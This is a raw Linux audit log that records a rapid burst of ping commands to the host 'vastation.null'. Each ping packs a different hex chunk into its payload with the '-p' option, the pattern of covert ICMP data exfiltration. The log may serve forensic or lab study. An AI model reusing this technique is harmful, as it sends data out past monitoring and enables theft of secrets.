type=EXECVE msg=audit(1742907873.172:1970): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="7f7394ed105dc1f01a7f7a0e240dd1f7" a5="vastation.null"
type=EXECVE msg=audit(1742907873.184:1974): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="310c57d742cd040380156fa2be4c08ae" a5="vastation.null"
type=EXECVE msg=audit(1742907873.192:1978): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="28e3b781cdc643e874c60b4ecf171e73" a5="vastation.null"
type=EXECVE msg=audit(1742907873.204:1982): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="92123850f9dd436ecc72172ac68411e6" a5="vastation.null"
type=EXECVE msg=audit(1742907873.212:1986): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="1af73705c9d933bb137054080fd74474" a5="vastation.null"
type=EXECVE msg=audit(1742907873.224:1990): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="cb7ad5f20b699c2299cceb4cdfe79579" a5="vastation.null"
type=EXECVE msg=audit(1742907873.232:1994): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="c431c990a75739215c591901973ce3fe" a5="vastation.null"
type=EXECVE msg=audit(1742907873.244:1999): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="34d30beaac97e0bde68266c55c733a5f" a5="vastation.null"
type=EXECVE msg=audit(1742907873.256:2003): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="2343b02dddd1ec0cdd49b160051b7d91" a5="vastation.null"
type=EXECVE msg=audit(1742907873.264:2007): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="7c44234d6b4298dbbcf7e3c3fd006635" a5="vastation.null"
type=EXECVE msg=audit(1742907873.276:2011): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="f26eff1b449b90fa8cfa4640ac11acab" a5="vastation.null"
type=EXECVE msg=audit(1742907873.288:2015): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="9d22292d666db61618be241c4747835e" a5="vastation.null"
type=EXECVE msg=audit(1742907873.296:2019): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="e7cf0b775e261ddbe4a74cb4292b5159" a5="vastation.null"
type=EXECVE msg=audit(1742907873.308:2023): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="60c746174db575d76d1f1b644c75ca46" a5="vastation.null"
type=EXECVE msg=audit(1742907873.316:2027): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="7897aaf73ac977a91e9fd0791d7732bd" a5="vastation.null"
type=EXECVE msg=audit(1742907873.328:2031): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="23bca091aa2a6b76843f1cf806963d12" a5="vastation.null"
type=EXECVE msg=audit(1742907873.336:2035): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="7c2e6264f9748d36b08e0980e37560f8" a5="vastation.null"
type=EXECVE msg=audit(1742907873.348:2039): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="ae4223ab80cbf46c760ce805e91dbeca" a5="vastation.null"
type=EXECVE msg=audit(1742907873.356:2043): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="52a36aebc216eaaa3180f8a22e587ec7" a5="vastation.null"
type=EXECVE msg=audit(1742907873.368:2047): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="161151392b0976a0a3f8e6ca5afdb8fb" a5="vastation.null"
type=EXECVE msg=audit(1742907873.380:2051): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="bd691ae3d00dddafd7c339c841ee3e91" a5="vastation.null"
type=EXECVE msg=audit(1742907873.388:2055): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="b40a47f0c487242d1e8f75cf4d26e1aa" a5="vastation.null"
type=EXECVE msg=audit(1742907873.400:2059): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="3ca7d93fad84428d337b186924078429" a5="vastation.null"
type=EXECVE msg=audit(1742907873.408:2063): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="08c0e3531f09515e818bba0164b51175" a5="vastation.null"
type=EXECVE msg=audit(1742907873.424:2067): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="72dc4d18f508dff4e8a84e3dfc866aa5" a5="vastation.null"
type=EXECVE msg=audit(1742907873.436:2071): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="0ec0905432ae60e30df081390025052d" a5="vastation.null"
type=EXECVE msg=audit(1742907873.444:2075): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="46d575a7c198e54ce6bc50cb722c782f" a5="vastation.null"
type=EXECVE msg=audit(1742907873.456:2079): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="2b8f9bbd3b2d4863c0d2366939dd2864" a5="vastation.null"
type=EXECVE msg=audit(1742907873.464:2083): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="dcb1f0cf4ff4e0e7dcb3937c81140c9e" a5="vastation.null"
type=EXECVE msg=audit(1742907873.476:2087): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="13f134cdf0a37f570d6409d5a92cd27f" a5="vastation.null"
type=EXECVE msg=audit(1742907873.484:2091): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="b67dd6829476afcecc1ebfcbae6b0493" a5="vastation.null"
type=EXECVE msg=audit(1742907873.496:2095): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="84805d513c1e781c0b7c28b1dba6bdc9" a5="vastation.null"
type=EXECVE msg=audit(1742907873.508:2099): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="79dd38368abacc3f8fa8e1631e716f54" a5="vastation.null"
type=EXECVE msg=audit(1742907873.516:2103): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="03611ef4069fa6e65c93dd1e01c89159" a5="vastation.null"
type=EXECVE msg=audit(1742907873.528:2107): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="24cb955dcb6eabb1737f28940d465b94" a5="vastation.null"
type=EXECVE msg=audit(1742907873.536:2111): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="541df8282d478c4b643c9b985ae81799" a5="vastation.null"
type=EXECVE msg=audit(1742907873.548:2115): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="7ed61b7a3889672b338001c4fbb9044a" a5="vastation.null"
type=EXECVE msg=audit(1742907873.560:2119): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="6ea3c4a5c920ff9c6178f9fe09bf3311" a5="vastation.null"
type=EXECVE msg=audit(1742907873.568:2123): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="b9e904b558387e5a101a503f05e78b91" a5="vastation.null"
type=EXECVE msg=audit(1742907873.592:2127): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="d736a2f9fabfbc55540d7ba16d7441dd" a5="vastation.null"
type=EXECVE msg=audit(1742907873.600:2131): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="11c6edbc7d23e427aef50c48e7238053" a5="vastation.null"
type=EXECVE msg=audit(1742907873.612:2135): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="bd4579d869c32814d6c45f676027f9a0" a5="vastation.null"
type=EXECVE msg=audit(1742907873.624:2139): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="910c4d4dc3f9900fffd11fbe869795a8" a5="vastation.null"
type=EXECVE msg=audit(1742907873.632:2143): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="32727a277829abb9112d396a77813c81" a5="vastation.null"
type=EXECVE msg=audit(1742907873.644:2147): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="75ac675c63c485bebe6e10abfc011352" a5="vastation.null"
type=EXECVE msg=audit(1742907873.656:2151): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="44bb76a8c41c5edfb072766b94ce71dd" a5="vastation.null"
type=EXECVE msg=audit(1742907873.668:2155): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="8358d526da1c2ce4a296f0d7a55c95cc" a5="vastation.null"
type=EXECVE msg=audit(1742907873.676:2159): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="b366ca5988d5b9db66dcfcf81e5d7c15" a5="vastation.null"
type=EXECVE msg=audit(1742907873.688:2163): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="baaf2f9238e5be6a6ae850a01645cf33" a5="vastation.null"
type=EXECVE msg=audit(1742907873.696:2167): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="a034bb9bb7e006999501665908757145" a5="vastation.null"
type=EXECVE msg=audit(1742907873.708:2171): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="b77be85a073a7cd6c4027b76102e88f7" a5="vastation.null"
type=EXECVE msg=audit(1742907873.716:2175): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="e7a25e226ea60976fc745e8c50be78e1" a5="vastation.null"
type=EXECVE msg=audit(1742907873.728:2179): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="2d5f346b7fad3fea8ba45804dff19e81" a5="vastation.null"
type=EXECVE msg=audit(1742907873.740:2183): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="2a13f12e149df57133938d93e4692d3d" a5="vastation.null"
type=EXECVE msg=audit(1742907873.752:2187): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="e9405ef6eb60229f18dab6820f1e18d0" a5="vastation.null"
type=EXECVE msg=audit(1742907873.760:2191): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="6d1dc5a8e4529dc61f79b9516950bff9" a5="vastation.null"
type=EXECVE msg=audit(1742907873.772:2195): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="5dcb4064449cf2bbed2b5c4fa69f1bf3" a5="vastation.null"
type=EXECVE msg=audit(1742907873.780:2199): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="bfafa8d3768df3309abb9d1cbd6e854e" a5="vastation.null"
type=EXECVE msg=audit(1742907873.792:2203): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="73082573032bf4b0dc3a2b363efbb5d9" a5="vastation.null"
type=EXECVE msg=audit(1742907873.800:2207): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="9fa660d2459667f254d993785bda0e5f" a5="vastation.null"
type=EXECVE msg=audit(1742907873.812:2211): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="30d0285c507c26344eb0d5e9fd7bfe27" a5="vastation.null"
type=EXECVE msg=audit(1742907873.824:2215): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="899221a03743d8ccdf05c6695cb91a4c" a5="vastation.null"
type=EXECVE msg=audit(1742907873.832:2219): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="772e23b54266adb3cc880f8aa21439d2" a5="vastation.null"
type=EXECVE msg=audit(1742907873.844:2223): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="414d29a848c20984073459d04ea28009" a5="vastation.null"
type=EXECVE msg=audit(1742907873.856:2227): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="9a79d9a4804f254b9fb2a933824a54f3" a5="vastation.null"
type=EXECVE msg=audit(1742907873.868:2231): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="0520bf43e3a420d6d4aa9b314a78c848" a5="vastation.null"
type=EXECVE msg=audit(1742907873.880:2235): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="1c3b26217c4aacc1aa6bdf755a26ebef" a5="vastation.null"
type=EXECVE msg=audit(1742907873.892:2239): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="a3c791783b4ebeb9261fe78d65e3a333" a5="vastation.null"
type=EXECVE msg=audit(1742907873.904:2243): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="0c6cb60f5fd26f84e239f4aa1a82dd8e" a5="vastation.null"
type=EXECVE msg=audit(1742907873.912:2247): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="ec9a76811bd4cc920c07538b2bfe38fe" a5="vastation.null"
type=EXECVE msg=audit(1742907873.920:2251): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="4136983bcc36f55fb8a5614734b91aa0" a5="vastation.null"
type=EXECVE msg=audit(1742907873.932:2255): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="f7b8816b643c9f5db5c5488d831fa567" a5="vastation.null"
type=EXECVE msg=audit(1742907873.944:2259): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="fd02a7d78f679b6a3dfc5c36ee4e38f7" a5="vastation.null"
type=EXECVE msg=audit(1742907873.952:2263): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="09f97fc5ae2df433d4f5400bc6b5732c" a5="vastation.null"
type=EXECVE msg=audit(1742907873.964:2267): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="780d18289d376233cbbdc49497dc45cc" a5="vastation.null"
type=EXECVE msg=audit(1742907873.976:2271): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="c1c093b41f0e3310ec957e1db401e78f" a5="vastation.null"
type=EXECVE msg=audit(1742907873.988:2275): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="d1f9dab1bf21ee9a621b7a437f1eea4d" a5="vastation.null"
type=EXECVE msg=audit(1742907873.996:2279): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="5215d271c11c9b536e23be0646ccd857" a5="vastation.null"
type=EXECVE msg=audit(1742907874.008:2283): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="67e7c4e25861ec8440ae3f8214a4a12f" a5="vastation.null"
type=EXECVE msg=audit(1742907874.016:2287): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="ecbf4b628b144f55ae6087b67ecde76d" a5="vastation.null"
type=EXECVE msg=audit(1742907874.028:2291): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="187a8a53d48c05a5212ac75f9a54c512" a5="vastation.null"
type=EXECVE msg=audit(1742907874.040:2295): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="c360cdd822b3a53abaa5017110c650b5" a5="vastation.null"
type=EXECVE msg=audit(1742907874.048:2299): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="2dc7432297f9b462b01aa7a5373fee83" a5="vastation.null"
type=EXECVE msg=audit(1742907874.056:2303): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="c72d5c530931d98e7f60056e24998d7c" a5="vastation.null"
type=EXECVE msg=audit(1742907874.068:2307): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="a92ec954352f9b88a2341adfff80d168" a5="vastation.null"
type=EXECVE msg=audit(1742907874.080:2311): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="b3cd82c6e8b223018538a9b062c740a7" a5="vastation.null"
type=EXECVE msg=audit(1742907874.088:2315): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="cbe7f389983921e6cd8e836741aefb7f" a5="vastation.null"
type=EXECVE msg=audit(1742907874.100:2319): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="0c2b315a963a863afe94948c93f7add8" a5="vastation.null"
type=EXECVE msg=audit(1742907874.108:2323): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="6a81e9e87f0567816dbefdbc2de47986" a5="vastation.null"
type=EXECVE msg=audit(1742907874.120:2327): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="1d6ec8c5d1771bf6183119bbd9e72c06" a5="vastation.null"
type=EXECVE msg=audit(1742907874.132:2331): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="4d386b24bc2ebb9e289bea6ab9acb351" a5="vastation.null"
type=EXECVE msg=audit(1742907874.140:2335): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="cc577438e6f0b0834ed953cbf7d59e92" a5="vastation.null"
type=EXECVE msg=audit(1742907874.152:2339): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="78a8a8fb162b24c8283a295e85ff459b" a5="vastation.null"
type=EXECVE msg=audit(1742907874.164:2343): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="116c186568da1ddefb8f597416d2eda9" a5="vastation.null"
type=EXECVE msg=audit(1742907874.172:2347): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="234e2bcbe9e8552deef6a0ac04879e67" a5="vastation.null"
type=EXECVE msg=audit(1742907874.184:2351): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="44845bc62e4f963f230539b4de5e670e" a5="vastation.null"
type=EXECVE msg=audit(1742907874.192:2355): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="cfa2ab2af32fa5f54029b12d471a61cf" a5="vastation.null"
type=EXECVE msg=audit(1742907874.204:2359): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="ef764a7eb2f266033edac4ca3d46d99e" a5="vastation.null"
type=EXECVE msg=audit(1742907874.212:2363): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="c8c3c5e2352d048fd1375ef992f9db67" a5="vastation.null"
type=EXECVE msg=audit(1742907874.224:2367): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="d50d7fc2136279a863a35538960f5b1b" a5="vastation.null"
type=EXECVE msg=audit(1742907874.232:2371): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="46ede7acb895ca672cfcde6c6b767e6f" a5="vastation.null"
type=EXECVE msg=audit(1742907874.244:2375): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="dcc7ec5d5f7bb81724c8495dba7587c4" a5="vastation.null"
type=EXECVE msg=audit(1742907874.256:2379): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="b69c6e39dd038e46bc13ccf78c497f58" a5="vastation.null"
type=EXECVE msg=audit(1742907874.264:2383): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="d1b3b834254195388d0e4f695b28213b" a5="vastation.null"
type=EXECVE msg=audit(1742907874.276:2387): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="cd565da5b4c91d365eb6f82a412f8812" a5="vastation.null"
type=EXECVE msg=audit(1742907874.288:2391): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="cbbdd4dad9a83d52e9803ca97be4e8be" a5="vastation.null"
type=EXECVE msg=audit(1742907874.296:2395): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="130542894c17a0cb717068fb6797f41d" a5="vastation.null"
type=EXECVE msg=audit(1742907874.308:2399): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="9b0b5b9dbb80535e0ba9d0340c135af6" a5="vastation.null"
type=EXECVE msg=audit(1742907874.316:2403): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="550dc7b2deb96ae54727cccedf193e0e" a5="vastation.null"
type=EXECVE msg=audit(1742907874.328:2407): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="9401373eb0baf18139f3b028a67eff24" a5="vastation.null"
type=EXECVE msg=audit(1742907874.336:2411): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="cd2a2c142e5446deb4955fcc92a4d3fd" a5="vastation.null"
type=EXECVE msg=audit(1742907874.348:2415): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="6b15d6c19cca59c6098ce5b3ac6dee26" a5="vastation.null"
type=EXECVE msg=audit(1742907874.360:2419): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="796b487ce6849fe4ff408ce8c7981af0" a5="vastation.null"
type=EXECVE msg=audit(1742907874.368:2423): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="54df72f8ecbf9d6a6217f83cb4e226e9" a5="vastation.null"
type=EXECVE msg=audit(1742907874.380:2427): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="7959fdef5fce8e3911fb3be7b9c3d560" a5="vastation.null"
type=EXECVE msg=audit(1742907874.392:2431): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="99b42e242f7fb4c179ece287d063c201" a5="vastation.null"
type=EXECVE msg=audit(1742907874.400:2435): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="cb081502d51262094d810634e76b1943" a5="vastation.null"
type=EXECVE msg=audit(1742907874.412:2439): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="4e0d47fd44449c88b0122bd2d72f979f" a5="vastation.null"
type=EXECVE msg=audit(1742907874.420:2443): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="c5da60ce8293cdddc003a25aeeddc97a" a5="vastation.null"
type=EXECVE msg=audit(1742907874.432:2447): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="7cf411e8ecd25777c22e29a0955621b8" a5="vastation.null"
type=EXECVE msg=audit(1742907874.440:2451): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="14b57c07d6a12fc26be0a0d53badd02f" a5="vastation.null"
type=EXECVE msg=audit(1742907874.452:2455): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="7b029a63154bac37be62dd8f703a6ea2" a5="vastation.null"
type=EXECVE msg=audit(1742907874.460:2459): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="d90c148f7bd9cf309fe6ce14060cd7f8" a5="vastation.null"
type=EXECVE msg=audit(1742907874.480:2463): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="30a3cfa98002ab9a21ff114904e9eb03" a5="vastation.null"
type=EXECVE msg=audit(1742907874.492:2467): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="00aa10ab9813aad778306d4ae30c2b80" a5="vastation.null"
type=EXECVE msg=audit(1742907874.504:2471): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="37a18726eb6ac0c2604e2492b0dee571" a5="vastation.null"
type=EXECVE msg=audit(1742907874.512:2475): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="7849567c6523aa7fd4f1a7fb28f9fe74" a5="vastation.null"
type=EXECVE msg=audit(1742907874.524:2479): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="f281ae75fb9b38183b57db4426e62709" a5="vastation.null"
type=EXECVE msg=audit(1742907874.536:2483): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="3f31cc262d3d93ffa8a49b7b6f7f8fe0" a5="vastation.null"
type=EXECVE msg=audit(1742907874.548:2487): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="e5e36f90c4ea692930a709bcf5a734f2" a5="vastation.null"
type=EXECVE msg=audit(1742907874.556:2491): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="de6e51a6e9b258b77c70236c5f4c9762" a5="vastation.null"
type=EXECVE msg=audit(1742907874.568:2495): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="6510c7a0a6aacab8a5174523f811c07a" a5="vastation.null"
type=EXECVE msg=audit(1742907874.576:2499): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="a93b0ba7cdfce9e2588341c53812f6a8" a5="vastation.null"
type=EXECVE msg=audit(1742907874.588:2503): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="04da20c0540d5c75dad7ea95046873ca" a5="vastation.null"
type=EXECVE msg=audit(1742907874.596:2507): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="0a27760a47206d430de31b0f9e89f676" a5="vastation.null"
type=EXECVE msg=audit(1742907874.608:2511): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="6e1110df5cb702ec3ad1121da17b0bab" a5="vastation.null"
type=EXECVE msg=audit(1742907874.616:2515): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="4c9559bfbe212362018ff328046dba0e" a5="vastation.null"
type=EXECVE msg=audit(1742907874.628:2519): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="b822e62f806514c3047389044eec3576" a5="vastation.null"
type=EXECVE msg=audit(1742907874.640:2523): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="9d28886e07406d4ab00755d3994f397c" a5="vastation.null"
type=EXECVE msg=audit(1742907874.648:2527): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="4e847c3f6e7968f4790f6f0130e397ad" a5="vastation.null"
type=EXECVE msg=audit(1742907874.660:2531): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="9f10375ce051ba822101b531155703e9" a5="vastation.null"
type=EXECVE msg=audit(1742907874.672:2535): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="9027e9f345841c240e171a946bf5edbe" a5="vastation.null"
type=EXECVE msg=audit(1742907874.684:2539): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="4a74d71dfae02b23f14648d626209aad" a5="vastation.null"
type=EXECVE msg=audit(1742907874.696:2543): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="1092e7bda5fde59af3e80a884aea615a" a5="vastation.null"
type=EXECVE msg=audit(1742907874.704:2547): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="a9228c97227d00080cd206a02d8c4ccf" a5="vastation.null"
type=EXECVE msg=audit(1742907874.716:2551): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="9cd3eeb17306be91dcb3768cce0c0ee4" a5="vastation.null"
type=EXECVE msg=audit(1742907874.728:2555): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="1de7f3d826be311ec19fe33639941aab" a5="vastation.null"
type=EXECVE msg=audit(1742907874.736:2559): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="967123801ba641fbdc40add880e8ee8a" a5="vastation.null"
type=EXECVE msg=audit(1742907874.748:2563): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="098f05f2147eb8dde96d526e1ef51430" a5="vastation.null"
type=EXECVE msg=audit(1742907874.756:2567): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="d5b6e8ceed21a96a84e729b47c5e8963" a5="vastation.null"
type=EXECVE msg=audit(1742907874.768:2571): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="f62b2d17e2dfcc4cf92553d8b9dd13ab" a5="vastation.null"
type=EXECVE msg=audit(1742907874.776:2575): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="d0d3a5c70d6ac4e9d6e4adc56050f30c" a5="vastation.null"
type=EXECVE msg=audit(1742907874.788:2579): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="7240a6dc1cd5d51d6705e7aadb77ca57" a5="vastation.null"
type=EXECVE msg=audit(1742907874.796:2583): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="6faf6501acb543126baef6b8d033b83b" a5="vastation.null"
type=EXECVE msg=audit(1742907874.808:2587): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="c09d81824ac47ccd61283ac90fe0fe24" a5="vastation.null"
type=EXECVE msg=audit(1742907874.820:2591): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="d752129e983c1e965ff59985125dcdd4" a5="vastation.null"
type=EXECVE msg=audit(1742907874.828:2595): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="bd0488d3f117bc24ce2b27fdd00190ce" a5="vastation.null"
type=EXECVE msg=audit(1742907874.840:2599): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="bd2597bd9fa03b2a6597913eb0651f37" a5="vastation.null"
type=EXECVE msg=audit(1742907874.852:2603): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="601ce9f0a39d434550ef95bb5c325e5e" a5="vastation.null"
type=EXECVE msg=audit(1742907874.860:2607): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="ce983f827d54231eb14d0e08bdee97b8" a5="vastation.null"
type=EXECVE msg=audit(1742907874.872:2611): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="83276a7d778ccb7864a8a5c38c6bc5c1" a5="vastation.null"
type=EXECVE msg=audit(1742907874.884:2615): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="080078f9580ab116c43ebf18f0b2f7e4" a5="vastation.null"
type=EXECVE msg=audit(1742907874.896:2619): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="5db7c65a9c7ffbdac34594b7db81dcf4" a5="vastation.null"
type=EXECVE msg=audit(1742907874.908:2623): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="95a55364bd96ab8d58a04a68d5b94ed2" a5="vastation.null"
type=EXECVE msg=audit(1742907874.920:2627): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="764f832d4d4dc2dbf546d3e93a7bed57" a5="vastation.null"
type=EXECVE msg=audit(1742907874.928:2631): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="c1b288e7a000018db39cb3084afe99a6" a5="vastation.null"
type=EXECVE msg=audit(1742907874.940:2635): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="c720239081279df7aaf4815865358365" a5="vastation.null"
type=EXECVE msg=audit(1742907874.952:2639): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="cb7ef8e91a89e9b2d86d2e8522ff66a5" a5="vastation.null"
type=EXECVE msg=audit(1742907874.960:2643): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="46382bcd62e6cb752dbb2986391ea749" a5="vastation.null"
type=EXECVE msg=audit(1742907874.972:2647): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="d48c74e9fa6e2247ce5f2f1cdbf59711" a5="vastation.null"
type=EXECVE msg=audit(1742907874.980:2651): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="c87ad2f070dc3abdc080f636041e0f00" a5="vastation.null"
type=EXECVE msg=audit(1742907874.992:2655): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="d9353fa39be50372d6bc71f95a7e553c" a5="vastation.null"
type=EXECVE msg=audit(1742907875.000:2659): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="42c795dcfedf1f6404f8f8dd9653c8b1" a5="vastation.null"
